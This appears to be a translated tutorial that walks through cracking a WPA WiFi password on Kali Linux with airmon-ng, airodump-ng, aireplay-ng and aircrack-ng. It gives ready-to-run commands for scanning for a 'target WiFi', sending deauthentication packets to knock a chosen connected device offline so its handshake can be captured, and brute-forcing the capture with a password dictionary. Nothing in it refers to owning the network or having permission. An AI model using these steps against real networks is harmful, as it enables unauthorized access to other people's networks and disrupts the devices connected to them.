Prerequisites: You must have a USB wireless network card
Connect the removable device (usb wireless network card) to the virtual machine, open the terminal to view the current wireless network card
root@kali: ~# airmon-ng
NIC name: wlan0mon
enable the card
root@kali: ~# airmon-ng start wlan0mon
Detect nearby wifi
root@kali: ~# airodump-ng wlan0mon
For the test, the absolute value of PWR is small, and the smaller the WiFi signal, the stronger the WiFi signal. Press ctrl+z to terminate the search.
Record the BSSID and CH of the target WiFi
listening router
root@kali:~# airodump-ng -w woshoubao -c X --bssid XX:XX:XX:XX:XX:XX wlan0mon --ignore-negative-one
After -w is the name of the handshake packet (can be defined by yourself), after -c is CH (channel), after --bssid is the bssid recorded in the previous step
What is displayed is the mac address connected to the WiFi device, and a line of devices is arbitrarily selected as the attack target. Here we take the first one as an example, record its STATION, create a new terminal, and do not turn off this terminal.
Intercept the handshake packet
root@kali:~# aireplay-ng --deaut 20 -a **:**:**:**:**:** -c **:**:**:**:**:** wlan0mon --ignore-negative-oneThe 20 after --deaut represents 20 attacks, the -a is the router's mac address (that is, the recorded bssid), and -c is the attacking device's mac address (that is, the STATION recorded in the previous step). This is to send a large amount of data to attack the device, causing it to disconnect from WiFi, waiting for the machine to reconnect to intercept the handshake packet
After a few seconds of attacking, the following interface will appear
This is the handshake we intercepted
A woshoubao-01.cap file will be found in the main directory, which is the intercepted handshake packet.
Then a dictionary of passwords is required, and success depends on whether the password is included in the dictionary.
The speed of cracking depends on the complexity of the password and the size of the dictionary
crack
aircrack-ng -w /tmp/123.txt woshoubao-01.cap
/tmp/123.txt is the path to the dictionary, and then starts to brute force the handshake packet
The password is simple and can be cracked quickly:
The password is complex, and I don't know when it can be cracked:
Why don't you go home and change your password? ?